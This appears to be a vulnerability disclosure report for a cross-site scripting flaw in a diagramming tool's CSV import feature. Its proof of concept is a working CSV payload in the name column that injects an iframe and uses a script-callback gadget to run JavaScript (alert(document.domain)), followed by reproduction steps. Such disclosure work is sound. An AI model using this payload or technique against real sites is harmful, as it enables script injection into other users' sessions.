Description

The application allows the user to import a CSV template into the schema, but does not clean the input from the columns resulting in any javascript code being executed.

Proof of Concept

##
## Example CSV import. Use ## for comments and # for configuration. Paste CSV below.
## The following names are reserved and should not be used (or ignored):
## id, tooltip, placeholder(s), link and label (see below)
##
# connect: {"from": "manager", "to": "name", "invert": true, "label": "manages", \
#          "style": "curved=1;endArrow=blockThin;endFill=1;fontSize=11;"}
# connect: {"from": "refs", "to": "id", "style": "curved=1;fontSize=11;"}
# layout: auto
#
## ---- CSV below this line. First line are column names. ----
name,position,id,location,manager,email,fill,stroke,refs,url,image
Tessa Miller'"><iframe srcdoc='<script src=https://apis.google.com/js/api.js?onload=DrawGapiClientCallbackxyz"-alert(document.domain)-"></script>'>,CFO,emi,Office 1,,[email protected],default,#6c8ebf,,https://www.draw.io,https://cdn3.iconfinder.com/data/icons/user-avatars-1/512/users-3-128.png

Step to reproduce

Click Insert button -> Advanced -> CSV -> Paste the payload above -> Trigger XSS

Evidence

PoC